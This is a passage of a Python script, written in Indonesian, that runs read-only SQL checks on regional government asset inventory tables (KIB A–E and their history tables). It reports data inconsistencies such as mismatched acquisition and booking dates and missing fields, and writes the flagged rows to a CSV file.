a.IDPemda, a.Kd_Id, a.No_Urut, a.Kd_Riwayat, a.Kd_Prov, a.Kd_Kab_Kota, a.Kd_Bidang, a.Kd_Unit, a.Kd_Sub, a.Kd_UPB, a.Kd_Aset1, a.Kd_Aset2, a.Kd_Aset3, a.Kd_Aset4, a.Kd_Aset5, a.No_Register, a.Kd_Pemilik, a.Tgl_Dokumen, a.No_Dokumen, a.Tgl_perolehan, a.Tgl_Pembukuan, a.harga
FROM Ta_KIBAR a LEFT JOIN Ta_KIB_A b ON a.IDPemda = b.IDPemda WHERE a.Tgl_Perolehan != b.Tgl_Perolehan
UNION ALL
SELECT
a.IDPemda, a.Kd_Id, a.No_Urut, a.Kd_Riwayat, a.Kd_Prov, a.Kd_Kab_Kota, a.Kd_Bidang, a.Kd_Unit, a.Kd_Sub, a.Kd_UPB, a.Kd_Aset1, a.Kd_Aset2, a.Kd_Aset3, a.Kd_Aset4, a.Kd_Aset5, a.No_Register, a.Kd_Pemilik, a.Tgl_Dokumen, a.No_Dokumen, a.Tgl_perolehan, a.Tgl_Pembukuan, a.harga
FROM Ta_KIBBR a LEFT JOIN Ta_KIB_B b ON a.IDPemda = b.IDPemda WHERE a.Tgl_Perolehan != b.Tgl_Perolehan
UNION ALL
SELECT
a.IDPemda, a.Kd_Id, a.No_Urut, a.Kd_Riwayat, a.Kd_Prov, a.Kd_Kab_Kota, a.Kd_Bidang, a.Kd_Unit, a.Kd_Sub, a.Kd_UPB, a.Kd_Aset1, a.Kd_Aset2, a.Kd_Aset3, a.Kd_Aset4, a.Kd_Aset5, a.No_Register, a.Kd_Pemilik, a.Tgl_Dokumen, a.No_Dokumen, a.Tgl_perolehan, a.Tgl_Pembukuan, a.harga
FROM Ta_KIBCR a LEFT JOIN Ta_KIB_C b ON a.IDPemda = b.IDPemda WHERE a.Tgl_Perolehan != b.Tgl_Perolehan
UNION ALL
SELECT
a.IDPemda, a.Kd_Id, a.No_Urut, a.Kd_Riwayat, a.Kd_Prov, a.Kd_Kab_Kota, a.Kd_Bidang, a.Kd_Unit, a.Kd_Sub, a.Kd_UPB, a.Kd_Aset1, a.Kd_Aset2, a.Kd_Aset3, a.Kd_Aset4, a.Kd_Aset5, a.No_Register, a.Kd_Pemilik, a.Tgl_Dokumen, a.No_Dokumen, a.Tgl_perolehan, a.Tgl_Pembukuan, a.harga
FROM Ta_KIBDR a LEFT JOIN Ta_KIB_D b ON a.IDPemda = b.IDPemda WHERE a.Tgl_Perolehan != b.Tgl_Perolehan
UNION ALL
SELECT
a.IDPemda, a.Kd_Id, a.No_Urut, a.Kd_Riwayat, a.Kd_Prov, a.Kd_Kab_Kota, a.Kd_Bidang, a.Kd_Unit, a.Kd_Sub, a.Kd_UPB, a.Kd_Aset1, a.Kd_Aset2, a.Kd_Aset3, a.Kd_Aset4, a.Kd_Aset5, a.No_Register, a.Kd_Pemilik, a.Tgl_Dokumen, a.No_Dokumen, a.Tgl_perolehan, a.Tgl_Pembukuan, a.harga
FROM Ta_KIBER a LEFT JOIN Ta_KIB_E b ON a.IDPemda = b.IDPemda WHERE a.Tgl_Perolehan != b.Tgl_Perolehan
""")
sourceRow = sourceCursor.fetchall()
result = sourceCursor.rowcount
if (result == 0) :
print("------Permasalahan 3 Passed-------")
else:
print("------Terdapat ",result," permasalahan-------")
writeToCsv.writerow(['Permasalahan 3: Solusi penyesuaian tanggal perolehan di riwayat mengikuti perolehan di KIB Induk'])
writeToCsv.writerow(['IDPemda', 'Kd_Id', 'No_Urut', 'Kd_Riwayat', 'Kd_Prov', 'Kd_Kab_Kota', 'Kd_Bidang', 'Kd_Unit', 'Kd_Sub', 'Kd_UPB', 'Kd_Aset1', 'Kd_Aset2', 'Kd_Aset3', 'Kd_Aset4', 'Kd_Aset5', 'No_Register', 'Kd_Pemilik', 'Tgl_Dokumen', 'No_Dokumen', 'Tgl_perolehan', 'Tgl_Pembukuan', 'harga'])
writeToCsv.writerows(sourceRow)
print("""
------Memeriksa Permasalahan 4-------
Permasalahan 4 yaitu Tanggal Pembukuan Berbeda dengan Tanggal Dokumen Pindah (untuk aset yang pindah skpd)""")
sourceCursor = sourceConn.cursor()
sourceCursor.execute("""
SELECT a.IDPemda, a.Kd_Id, a.No_Urut, a.Kd_Riwayat, a.Kd_Prov, a.Kd_Kab_Kota, a.Kd_Bidang, a.Kd_Unit, a.Kd_Sub, a.Kd_UPB, a.Kd_Aset1, a.Kd_Aset2, a.Kd_Aset3, a.Kd_Aset4, a.Kd_Aset5, a.No_Register, a.Kd_Pemilik, a.Tgl_Dokumen, a.No_Dokumen, a.Tgl_perolehan, a.Tgl_Pembukuan, a.harga
FROM Ta_KIBAR a WHERE Kd_Riwayat = 3 AND Tgl_Dokumen != Tgl_Pembukuan
UNION ALL
SELECT a.IDPemda, a.Kd_Id, a.No_Urut, a.Kd_Riwayat, a.Kd_Prov, a.Kd_Kab_Kota, a.Kd_Bidang, a.Kd_Unit, a.Kd_Sub, a.Kd_UPB, a.Kd_Aset1, a.Kd_Aset2, a.Kd_Aset3, a.Kd_Aset4, a.Kd_Aset5, a.No_Register, a.Kd_Pemilik, a.Tgl_Dokumen, a.No_Dokumen, a.Tgl_perolehan, a.Tgl_Pembukuan, a.harga
FROM Ta_KIBBR a WHERE Kd_Riwayat = 3 AND Tgl_Dokumen != Tgl_Pembukuan
UNION ALL
SELECT a.IDPemda, a.Kd_Id, a.No_Urut, a.Kd_Riwayat, a.Kd_Prov, a.Kd_Kab_Kota, a.Kd_Bidang, a.Kd_Unit, a.Kd_Sub, a.Kd_UPB, a.Kd_Aset1, a.Kd_Aset2, a.Kd_Aset3, a.Kd_Aset4, a.Kd_Aset5, a.No_Register, a.Kd_Pemilik, a.Tgl_Dokumen, a.No_Dokumen, a.Tgl_perolehan, a.Tgl_Pembukuan, a.harga
FROM Ta_KIBCR a WHERE Kd_Riwayat = 3 AND Tgl_Dokumen != Tgl_Pembukuan
UNION ALL
SELECT a.IDPemda, a.Kd_Id, a.No_Urut, a.Kd_Riwayat, a.Kd_Prov, a.Kd_Kab_Kota, a.Kd_Bidang, a.Kd_Unit, a.Kd_Sub, a.Kd_UPB, a.Kd_Aset1, a.Kd_Aset2, a.Kd_Aset3, a.Kd_Aset4, a.Kd_Aset5, a.No_Register, a.Kd_Pemilik, a.Tgl_Dokumen, a.No_Dokumen, a.Tgl_perolehan, a.Tgl_Pembukuan, a.harga
FROM Ta_KIBDR a WHERE Kd_Riwayat = 3 AND Tgl_Dokumen != Tgl_Pembukuan
UNION ALL
SELECT a.IDPemda, a.Kd_Id, a.No_Urut, a.Kd_Riwayat, a.Kd_Prov, a.Kd_Kab_Kota, a.Kd_Bidang, a.Kd_Unit, a.Kd_Sub, a.Kd_UPB, a.Kd_Aset1, a.Kd_Aset2, a.Kd_Aset3, a.Kd_Aset4, a.Kd_Aset5, a.No_Register, a.Kd_Pemilik, a.Tgl_Dokumen, a.No_Dokumen, a.Tgl_perolehan, a.Tgl_Pembukuan, a.harga
FROM Ta_KIBER a WHERE Kd_Riwayat = 3 AND Tgl_Dokumen != Tgl_Pembukuan
""")
sourceRow = sourceCursor.fetchall()
result = sourceCursor.rowcount
if (result == 0) :
print("------Permasalahan 4 Passed-------")
else:
print("------Terdapat ",result," permasalahan-------")
writeToCsv.writerow(['Permasalahan 4: Solusi penyesuaian tanggal pembukuan dengan tanggal dokumen pindah.'])
writeToCsv.writerow(['IDPemda', 'Kd_Id', 'No_Urut', 'Kd_Riwayat', 'Kd_Prov', 'Kd_Kab_Kota', 'Kd_Bidang', 'Kd_Unit', 'Kd_Sub', 'Kd_UPB', 'Kd_Aset1', 'Kd_Aset2', 'Kd_Aset3', 'Kd_Aset4', 'Kd_Aset5', 'No_Register', 'Kd_Pemilik', 'Tgl_Dokumen', 'No_Dokumen', 'Tgl_perolehan', 'Tgl_Pembukuan', 'harga'])
writeToCsv.writerows(sourceRow)
print("""
------Memeriksa Permasalahan 5-------
Permasalahan 5 yaitu Aset dirubah kondisi RB lalu indah skpd, kondisinya kembali ke BAIK""")
sourceCursor = sourceConn.cursor()
sourceCursor.execute("""
SELECT a.IDPemda, a.Kd_Id, a.No_Urut, a.Kd_Riwayat, a.Kd_Prov, a.Kd_Kab_Kota, a.Kd_Bidang, a.Kd_Unit, a.Kd_Sub,
a.Kd_UPB, a.Kd_Aset1, a.Kd_Aset2, a.Kd_Aset3, a.Kd_Aset4, a.Kd_Aset5, a.No_Register, a.Kd_Pemilik, a.Tgl_Dokumen,
a.No_Dokumen, a.Tgl_perolehan, a.Tgl_Pembukuan, a.harga
FROM Ta_KIBBR a
LEFT JOIN Ta_KIB_B b ON a.IDPemda = b.IDPemda
LEFT JOIN
(
SELECT * FROM Ta_KIBBR d WHERE d.Kd_Riwayat = 1
) c ON a.IDPemda = c.IDPemda AND (a.No_Urut - c.No_Urut) = 1
WHERE a.Kd_Riwayat = 3 AND ((a.Kondisi = 1 AND b.Kondisi = 3) OR (a.Kondisi = 1 AND c.Kondisi = 3))
UNION ALL
SELECT a.IDPemda, a.Kd_Id, a.No_Urut, a.Kd_Riwayat, a.Kd_Prov, a.Kd_Kab_Kota, a.Kd_Bidang, a.Kd_Unit, a.Kd_Sub,
a.Kd_UPB, a.Kd_Aset1, a.Kd_Aset2, a.Kd_Aset3, a.Kd_Aset4, a.Kd_Aset5, a.No_Register, a.Kd_Pemilik, a.Tgl_Dokumen,
a.No_Dokumen, a.Tgl_perolehan, a.Tgl_Pembukuan, a.harga
FROM Ta_KIBCR a
LEFT JOIN Ta_KIB_C b ON a.IDPemda = b.IDPemda
LEFT JOIN
(
SELECT * FROM Ta_KIBCR d WHERE d.Kd_Riwayat = 1
) c ON a.IDPemda = c.IDPemda AND (a.No_Urut - c.No_Urut) = 1
WHERE a.Kd_Riwayat = 3 AND ((a.Kondisi = 1 AND b.Kondisi = 3) OR (a.Kondisi = 1 AND c.Kondisi = 3))
UNION ALL
SELECT a.IDPemda, a.Kd_Id, a.No_Urut, a.Kd_Riwayat, a.Kd_Prov, a.Kd_Kab_Kota, a.Kd_Bidang, a.Kd_Unit, a.Kd_Sub,
a.Kd_UPB, a.Kd_Aset1, a.Kd_Aset2, a.Kd_Aset3, a.Kd_Aset4, a.Kd_Aset5, a.No_Register, a.Kd_Pemilik, a.Tgl_Dokumen,
a.No_Dokumen, a.Tgl_perolehan, a.Tgl_Pembukuan, a.harga
FROM Ta_KIBDR a
LEFT JOIN Ta_KIB_D b ON a.IDPemda = b.IDPemda
LEFT JOIN
(
SELECT * FROM Ta_KIBDR d WHERE d.Kd_Riwayat = 1
) c ON a.IDPemda = c.IDPemda AND (a.No_Urut - c.No_Urut) = 1
WHERE a.Kd_Riwayat = 3 AND ((a.Kondisi = 1 AND b.Kondisi = 3) OR (a.Kondisi = 1 AND c.Kondisi = 3))
UNION ALL
SELECT a.IDPemda, a.Kd_Id, a.No_Urut, a.Kd_Riwayat, a.Kd_Prov, a.Kd_Kab_Kota, a.Kd_Bidang, a.Kd_Unit, a.Kd_Sub,
a.Kd_UPB, a.Kd_Aset1, a.Kd_Aset2, a.Kd_Aset3, a.Kd_Aset4, a.Kd_Aset5, a.No_Register, a.Kd_Pemilik, a.Tgl_Dokumen,
a.No_Dokumen, a.Tgl_perolehan, a.Tgl_Pembukuan, a.harga
FROM Ta_KIBER a
LEFT JOIN Ta_KIB_E b ON a.IDPemda = b.IDPemda
LEFT JOIN
(
SELECT * FROM Ta_KIBER d WHERE d.Kd_Riwayat = 1
) c ON a.IDPemda = c.IDPemda AND (a.No_Urut - c.No_Urut) = 1
WHERE a.Kd_Riwayat = 3 AND ((a.Kondisi = 1 AND b.Kondisi = 3) OR (a.Kondisi = 1 AND c.Kondisi = 3))
""")
sourceRow = sourceCursor.fetchall()
result = sourceCursor.rowcount
if (result == 0) :
print("------Permasalahan 5 Passed-------")
else:
print("------Terdapat ",result," permasalahan-------")
writeToCsv.writerow(['Permasalahan 5: Solusi Penyesuaian kondisi di KIB dan riwayat.'])
writeToCsv.writerow(['IDPemda', 'Kd_Id', 'No_Urut', 'Kd_Riwayat', 'Kd_Prov', 'Kd_Kab_Kota', 'Kd_Bidang', 'Kd_Unit', 'Kd_Sub', 'Kd_UPB', 'Kd_Aset1', 'Kd_Aset2', 'Kd_Aset3', 'Kd_Aset4', 'Kd_Aset5', 'No_Register', 'Kd_Pemilik', 'Tgl_Dokumen', 'No_Dokumen', 'Tgl_perolehan', 'Tgl_Pembukuan', 'harga'])
writeToCsv.writerows(sourceRow)
print("""
------Memeriksa Permasalahan 6-------
SKIPPED""")
print("""
------Memeriksa Permasalahan 7-------
Permasalahan 7 yaitu Tanggal Pembukuan lebih kecil dari tanggal perolehan""")
sourceCursor = sourceConn.cursor()
sourceCursor.execute("""
SELECT a.IDPemda, a.Kd_Prov, a.Kd_Kab_Kota, a.Kd_Bidang, a.Kd_Unit, a.Kd_Sub, a.Kd_UPB, a.Kd_Aset1, a.Kd_Aset2, a.Kd_Aset3, a.Kd_Aset4, a.Kd_Aset5, a.No_Register, a.Kd_Pemilik, a.Tgl_perolehan, a.Tgl_Pembukuan, a.harga
FROM Ta_KIB_A a WHERE Tgl_Pembukuan < Tgl_Perolehan
UNION ALL
SELECT a.IDPemda, a.Kd_Prov, a.Kd_Kab_Kota, a.Kd_Bidang, a.Kd_Unit, a.Kd_Sub, a.Kd_UPB, a.Kd_Aset1, a.Kd_Aset2, a.Kd_Aset3, a.Kd_Aset4, a.Kd_Aset5, a.No_Register, a.Kd_Pemilik, a.Tgl_perolehan, a.Tgl_Pembukuan, a.harga
FROM Ta_KIB_B a WHERE Tgl_Pembukuan < Tgl_Perolehan
UNION ALL
SELECT a.IDPemda, a.Kd_Prov, a.Kd_Kab_Kota, a.Kd_Bidang, a.Kd_Unit, a.Kd_Sub, a.Kd_UPB, a.Kd_Aset1, a.Kd_Aset2, a.Kd_Aset3, a.Kd_Aset4, a.Kd_Aset5, a.No_Register, a.Kd_Pemilik, a.Tgl_perolehan, a.Tgl_Pembukuan, a.harga
FROM Ta_KIB_C a WHERE Tgl_Pembukuan < Tgl_Perolehan
UNION ALL
SELECT a.IDPemda, a.Kd_Prov, a.Kd_Kab_Kota, a.Kd_Bidang, a.Kd_Unit, a.Kd_Sub, a.Kd_UPB, a.Kd_Aset1, a.Kd_Aset2, a.Kd_Aset3, a.Kd_Aset4, a.Kd_Aset5, a.No_Register, a.Kd_Pemilik, a.Tgl_perolehan, a.Tgl_Pembukuan, a.harga
FROM Ta_KIB_D a WHERE Tgl_Pembukuan < Tgl_Perolehan
UNION ALL
SELECT a.IDPemda, a.Kd_Prov, a.Kd_Kab_Kota, a.Kd_Bidang, a.Kd_Unit, a.Kd_Sub, a.Kd_UPB, a.Kd_Aset1, a.Kd_Aset2, a.Kd_Aset3, a.Kd_Aset4, a.Kd_Aset5, a.No_Register, a.Kd_Pemilik, a.Tgl_perolehan, a.Tgl_Pembukuan, a.harga
FROM Ta_KIB_E a WHERE Tgl_Pembukuan < Tgl_Perolehan
""")
sourceRow = sourceCursor.fetchall()
result = sourceCursor.rowcount
if (result == 0) :
print("------Permasalahan 7 Passed-------")
else:
print("------Terdapat ",result," permasalahan-------")
writeToCsv.writerow(['Permasalahan 7: Solusi penyesuaian sesuaikan tanggal pembukuan minimum sama dengan tanggal perolehan'])
writeToCsv.writerow(['IDPemda', 'Kd_Prov', 'Kd_Kab_Kota', 'Kd_Bidang', 'Kd_Unit', 'Kd_Sub', 'Kd_UPB', 'Kd_Aset1', 'Kd_Aset2', 'Kd_Aset3', 'Kd_Aset4', 'Kd_Aset5', 'No_Register', 'Kd_Pemilik', 'Tgl_Dokumen', 'No_Dokumen', 'Tgl_perolehan', 'Tgl_Pembukuan', 'harga'])
writeToCsv.writerows(sourceRow)
print("""
------Memeriksa Permasalahan 8-------
Permasalahan 8 yaitu Tanggal Pembukuan lebih kecil dari tanggal perolehan""")
sourceCursor = sourceConn.cursor()
sourceCursor.execute("""
SELECT a.IDPemda, a.Kd_Id, a.No_Urut, a.Kd_Riwayat, a.Kd_Prov, a.Kd_Kab_Kota, a.Kd_Bidang, a.Kd_Unit, a.Kd_Sub, a.Kd_UPB, a.Kd_Aset1, a.Kd_Aset2, a.Kd_Aset3, a.Kd_Aset4, a.Kd_Aset5, a.No_Register, a.Kd_Pemilik, a.Tgl_Dokumen, a.No_Dokumen, a.Tgl_perolehan, a.Tgl_Pembukuan, a.harga
FROM Ta_KIBAR a LEFT JOIN Ta_KIB_A b ON a.IDPemda = b.IDPemda WHERE a.Kd_KA != b.Kd_KA
UNION ALL
SELECT a.IDPemda, a.Kd_Id, a.No_Urut, a.Kd_Riwayat, a.Kd_Prov, a.Kd_Kab_Kota, a.Kd_Bidang, a.Kd_Unit, a.Kd_Sub, a.Kd_UPB, a.Kd_Aset1, a.Kd_Aset2, a.Kd_Aset3, a.Kd_Aset4, a.Kd_Aset5, a.No_Register, a.Kd_Pemilik, a.Tgl_Dokumen, a.No_Dokumen, a.Tgl_perolehan, a.Tgl_Pembukuan, a.harga
FROM Ta_KIBBR a LEFT JOIN Ta_KIB_B b ON a.IDPemda = b.IDPemda WHERE a.Kd_KA != b.Kd_KA
UNION ALL
SELECT a.IDPemda, a.Kd_Id, a.No_Urut, a.Kd_Riwayat, a.Kd_Prov, a.Kd_Kab_Kota, a.Kd_Bidang, a.Kd_Unit, a.Kd_Sub, a.Kd_UPB, a.Kd_Aset1, a.Kd_Aset2, a.Kd_Aset3, a.Kd_Aset4, a.Kd_Aset5, a.No_Register, a.Kd_Pemilik, a.Tgl_Dokumen, a.No_Dokumen, a.Tgl_perolehan, a.Tgl_Pembukuan, a.harga
FROM Ta_KIBCR a LEFT JOIN Ta_KIB_C b ON a.IDPemda = b.IDPemda WHERE a.Kd_KA != b.Kd_KA
UNION ALL
SELECT a.IDPemda, a.Kd_Id, a.No_Urut, a.Kd_Riwayat, a.Kd_Prov, a.Kd_Kab_Kota, a.Kd_Bidang, a.Kd_Unit, a.Kd_Sub, a.Kd_UPB, a.Kd_Aset1, a.Kd_Aset2, a.Kd_Aset3, a.Kd_Aset4, a.Kd_Aset5, a.No_Register, a.Kd_Pemilik, a.Tgl_Dokumen, a.No_Dokumen, a.Tgl_perolehan, a.Tgl_Pembukuan, a.harga
FROM Ta_KIBDR a LEFT JOIN Ta_KIB_D b ON a.IDPemda = b.IDPemda WHERE a.Kd_KA != b.Kd_KA
UNION ALL
SELECT a.IDPemda, a.Kd_Id, a.No_Urut, a.Kd_Riwayat, a.Kd_Prov, a.Kd_Kab_Kota, a.Kd_Bidang, a.Kd_Unit, a.Kd_Sub, a.Kd_UPB, a.Kd_Aset1, a.Kd_Aset2, a.Kd_Aset3, a.Kd_Aset4, a.Kd_Aset5, a.No_Register, a.Kd_Pemilik, a.Tgl_Dokumen, a.No_Dokumen, a.Tgl_perolehan, a.Tgl_Pembukuan, a.harga
FROM Ta_KIBER a LEFT JOIN Ta_KIB_E b ON a.IDPemda = b.IDPemda WHERE a.Kd_KA != b.Kd_KA
""")
sourceRow = sourceCursor.fetchall()
result = sourceCursor.rowcount
if (result == 0) :
print("------Permasalahan 8 Passed-------")
else:
print("------Terdapat ",result," permasalahan-------")
writeToCsv.writerow(['Permasalahan 8: Solusi Penyesuaian Kode KA riwayat mengikuti kode KA induk'])
writeToCsv.writerow(['IDPemda', 'Kd_Id', 'No_Urut', 'Kd_Riwayat', 'Kd_Prov', 'Kd_Kab_Kota', 'Kd_Bidang', 'Kd_Unit', 'Kd_Sub', 'Kd_UPB', 'Kd_Aset1', 'Kd_Aset2', 'Kd_Aset3', 'Kd_Aset4', 'Kd_Aset5', 'No_Register', 'Kd_Pemilik', 'Tgl_Dokumen', 'No_Dokumen', 'Tgl_perolehan', 'Tgl_Pembukuan', 'harga'])
writeToCsv.writerows(sourceRow)
print("""
------Memeriksa Permasalahan 9-------
Permasalahan 9 yaitu Terdapat data Tanggal Pembukuan, Tanggal Perolehan, dan Masa Manfaat yang tidak diisi baik pada KIB Induk maupun KIB Riwayat""")
sourceCursor = sourceConn.cursor()
sourceCursor.execute("""
SELECT a.IDPemda, a.Kd_Id, a.No_Urut, a.Kd_Riwayat, a.Kd_Prov, a.Kd_Kab_Kota, a.Kd_Bidang, a.Kd_Unit, a.Kd_Sub, a.Kd_UPB, a.Kd_Aset1, a.Kd_Aset2, a.Kd_Aset3, a.Kd_Aset4, a.Kd_Aset5, a.No_Register, a.Kd_Pemilik, a.Tgl_Dokumen, a.No_Dokumen, a.Tgl_perolehan, a.Tgl_Pembukuan, a.harga, 0 AS Masa_Manfaat,
CASE WHEN a.Tgl_Perolehan IS NULL THEN 'Tgl_Perolehan Riwayat NULL' WHEN b.Tgl_Perolehan IS NULL THEN 'Tgl_Perolehan Induk NULL' END AS Ket_Perolehan,
CASE WHEN a.Tgl_Pembukuan IS NULL THEN 'Tgl_Pembukuan Riwayat NULL' WHEN b.Tgl_Pembukuan IS NULL THEN 'Tgl_Pembukuan Induk NULL' END AS Ket_Pembukuan,
NULL AS Ket_MM
FROM Ta_KIBAR a LEFT JOIN Ta_KIB_A b ON a.IDPemda = b.IDPemda WHERE a.Tgl_Perolehan IS NULL OR a.Tgl_Pembukuan IS NULL OR b.Tgl_Perolehan IS NULL OR b.Tgl_Pembukuan IS NULL
UNION ALL
SELECT a.IDPemda, a.Kd_Id, a.No_Urut, a.Kd_Riwayat, a.Kd_Prov, a.Kd_Kab_Kota, a.Kd_Bidang, a.Kd_Unit, a.Kd_Sub, a.Kd_UPB, a.Kd_Aset1, a.Kd_Aset2, a.Kd_Aset3, a.Kd_Aset4, a.Kd_Aset5, a.No_Register, a.Kd_Pemilik, a.Tgl_Dokumen, a.No_Dokumen, a.Tgl_perolehan, a.Tgl_Pembukuan, a.harga, a.Masa_Manfaat,
CASE WHEN a.Tgl_Perolehan IS NULL THEN 'Tgl_Perolehan Riwayat NULL' WHEN b.Tgl_Perolehan IS NULL THEN 'Tgl_Perolehan Induk NULL' END AS Ket_Perolehan,
CASE WHEN a.Tgl_Pembukuan IS NULL THEN 'Tgl_Pembukuan Riwayat NULL' WHEN b.Tgl_Pembukuan IS NULL THEN 'Tgl_Pembukuan Induk NULL' END AS Ket_Pembukuan,
CASE WHEN a.Masa_Manfaat IS NULL THEN 'MM Riwayat NULL' WHEN b.Masa_Manfaat IS NULL THEN 'MM Induk NULL' END AS Ket_MM
FROM Ta_KIBBR a LEFT JOIN Ta_KIB_B b ON a.IDPemda = b.IDPemda WHERE a.Tgl_Perolehan IS NULL OR a.Tgl_Pembukuan IS NULL OR b.Tgl_Perolehan IS NULL OR b.Tgl_Pembukuan IS NULL OR a.Masa_Manfaat IS NULL OR b.Masa_Manfaat IS NULL
UNION ALL
SELECT a.IDPemda, a.Kd_Id, a.No_Urut, a.Kd_Riwayat, a.Kd_Prov, a.Kd_Kab_Kota, a.Kd_Bidang, a.Kd_Unit, a.Kd_Sub, a.Kd_UPB, a.Kd_Aset1, a.Kd_Aset2, a.Kd_Aset3, a.Kd_Aset4, a.Kd_Aset5, a.No_Register, a.Kd_Pemilik, a.Tgl_Dokumen, a.No_Dokumen, a.Tgl_perolehan, a.Tgl_Pembukuan, a.harga, a.Masa_Manfaat,
CASE WHEN a.Tgl_Perolehan IS NULL THEN 'Tgl_Perolehan Riwayat NULL' WHEN b.Tgl_Perolehan IS NULL THEN 'Tgl_Perolehan Induk NULL' END AS Ket_Perolehan,
CASE WHEN a.Tgl_Pembukuan IS NULL THEN 'Tgl_Pembukuan Riwayat NULL' WHEN b.Tgl_Pembukuan IS NULL THEN 'Tgl_Pembukuan Induk NULL' END AS Ket_Pembukuan,
CASE WHEN a.Masa_Manfaat IS NULL THEN 'MM Riwayat NULL' WHEN b.Masa_Manfaat IS NULL THEN 'MM Induk NULL' END AS Ket_MM
FROM Ta_KIBCR a LEFT JOIN Ta_KIB_C b ON a.IDPemda = b.IDPemda WHERE a.Tgl_Perolehan IS NULL OR a.Tgl_Pembukuan IS NULL OR b.Tgl_Perolehan IS NULL OR b.Tgl_Pembukuan IS NULL OR a.Masa_Manfaat IS NULL OR b.Masa_Manfaat IS NULL
UNION ALL
SELECT a.IDPemda, a.Kd_Id, a.No_Urut, a.Kd_Riwayat, a.Kd_Prov, a.Kd_Kab_Kota, a.Kd_Bidang, a.Kd_Unit, a.Kd_Sub, a.Kd_UPB, a.Kd_Aset1, a.Kd_Aset2, a.Kd_Aset3, a.Kd_Aset4, a.Kd_Aset5, a.No_Register, a.Kd_Pemilik, a.Tgl_Dokumen, a.No_Dokumen, a.Tgl_perolehan, a.Tgl_Pembukuan, a.harga, a.Masa_Manfaat,
CASE WHEN a.Tgl_Perolehan IS NULL THEN 'Tgl_Perolehan Riwayat NULL' WHEN b.Tgl_Perolehan IS NULL THEN 'Tgl_Perolehan Induk NULL' END AS Ket_Perolehan,
CASE WHEN a.Tgl_Pembukuan IS NULL THEN 'Tgl_Pembukuan Riwayat NULL' WHEN b.Tgl_Pembukuan IS NULL THEN 'Tgl_Pembukuan Induk NULL' END AS Ket_Pembukuan,
CASE WHEN a.Masa_Manfaat IS NULL THEN 'MM Riwayat NULL' WHEN b.Masa_Manfaat IS NULL THEN 'MM Induk NULL' END AS Ket_MM
FROM Ta_KIBDR a LEFT JOIN Ta_KIB_D b ON a.IDPemda = b.IDPemda WHERE a.Tgl_Perolehan IS NULL OR a.Tgl_Pembukuan IS NULL OR b.Tgl_Perolehan IS NULL OR b.Tgl_Pembukuan IS NULL OR a.Masa_Manfaat IS NULL OR b.Masa_Manfaat IS NULL
UNION ALL
SELECT a.IDPemda, a.Kd_Id, a.No_Urut, a.Kd_Riwayat, a.Kd_Prov, a.Kd_Kab_Kota, a.Kd_Bidang, a.Kd_Unit, a.Kd_Sub, a.Kd_UPB, a.Kd_Aset1, a.Kd_Aset2, a.Kd_Aset3, a.Kd_Aset4, a.Kd_Aset5, a.No_Register, a.Kd_Pemilik, a.Tgl_Dokumen, a.No_Dokumen, a.Tgl_perolehan, a.Tgl_Pembukuan, a.harga, a.Masa_Manfaat,
CASE WHEN a.Tgl_Perolehan IS NULL THEN 'Tgl_Perolehan Riwayat NULL' WHEN b.Tgl_Perolehan IS NULL THEN 'Tgl_Perolehan Induk NULL' END AS Ket_Perolehan,
CASE WHEN a.Tgl_Pembukuan IS NULL THEN 'Tgl_Pembukuan Riwayat NULL' WHEN b.Tgl_Pembukuan IS NULL THEN 'Tgl_Pembukuan Induk NULL' END AS Ket_Pembukuan,
CASE WHEN a.Masa_Manfaat IS NULL THEN 'MM Riwayat NULL' WHEN b.Masa_Manfaat IS NULL THEN 'MM Induk NULL' END AS Ket_MM
FROM Ta_KIBER a LEFT JOIN Ta_KIB_E b ON a.IDPemda = b.IDPemda WHERE a.Tgl_Perolehan IS NULL OR a.Tgl_Pembukuan IS NULL OR b.Tgl_Perolehan IS NULL OR b.Tgl_Pembukuan IS NULL OR a.Masa_Manfaat IS NULL OR b.Masa_Manfaat IS NULL
UNION ALL
SELECT a.IDPemda, 0 AS Kd_Id, 0 AS No_Urut, 0 AS Kd_Riwayat, a.Kd_Prov, a.Kd_Kab_Kota, a.Kd_Bidang, a.Kd_Unit, a.Kd_Sub, a.Kd_UPB, a.Kd_Aset1, a.Kd_Aset2, a.Kd_Aset3, a.Kd_Aset4, a.Kd_Aset5, a.No_Register, a.Kd_Pemilik, NULL AS Tgl_Dokumen, NULL AS No_Dokumen, a.Tgl_perolehan, a.Tgl_Pembukuan, a.harga, a.Masa_Manfaat,
CASE WHEN a.Tgl_Perolehan IS NULL THEN 'Tgl_Perolehan Riwayat NULL' END AS Ket_Perolehan,
CASE WHEN a.Tgl_Pembukuan IS NULL THEN 'Tgl_Pembukuan Riwayat NULL' END AS Ket_Pembukuan,
CASE WHEN a.Masa_Manfaat IS NULL THEN 'MM Riwayat NULL' END AS Ket_MM
FROM Ta_Lainnya a WHERE a.Tgl_Perolehan IS NULL OR a.Tgl_Pembukuan IS NULL OR a.Masa_Manfaat IS NULL
""")
sourceRow = sourceCursor.fetchall()
result = sourceCursor.rowcount
if (result == 0) :
print("------Permasalahan 9 Passed-------")
else:
print("------Terdapat ",result," permasalahan-------")
writeToCsv.writerow(['Permasalahan 9: Solusi isi data Tanggal Pembukuan, Tanggal Perolehan, dan Masa Manfaat sesuai dengan yang seharusnya terisi'])
writeToCsv.writerow(['IDPemda', 'Kd_Id', 'No_Urut', 'Kd_Riwayat', 'Kd_Prov', 'Kd_Kab_Kota', 'Kd_Bidang', 'Kd_Unit', 'Kd_Sub', 'Kd_UPB', 'Kd_Aset1', 'Kd_Aset2', 'Kd_Aset3', 'Kd_Aset4', 'Kd_Aset5', 'No_Register', 'Kd_Pemilik', 'Tgl_Dokumen', 'No_Dokumen', 'Tgl_perolehan', 'Tgl_Pembukuan', 'harga', 'Masa_Manfaat', 'Ket_Perolehan', 'Ket_Pembukuan', 'Ket_MM'])
writeToCsv.writerows(sourceRow)
done = True
print("Setup selesai, anda dapat menutup aplikasi ini. Terimakasih telah menggunakan aplikasi ini. Silakan buka file output.csv untuk melihat file-file bermasalah dan solusinya.")
status = False
# t = threading.Thread(target = selesai)
# t.start()
| 69.429975
| 361
| 0.721495
| 5,134
| 28,258
| 3.719322
| 0.051227
| 0.076512
| 0.035402
| 0.014664
| 0.882954
| 0.882587
| 0.874051
| 0.869547
| 0.86431
| 0.834564
| 0
| 0.016466
| 0.148949
| 28,258
| 407
| 362
| 69.429975
| 0.777538
| 0.005237
| 0
| 0.631436
| 0
| 0.273713
| 0.843983
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.01084
| false
| 0.02981
| 0.01084
| 0
| 0.02439
| 0.089431
| 0
| 0
| 0
| null | 0
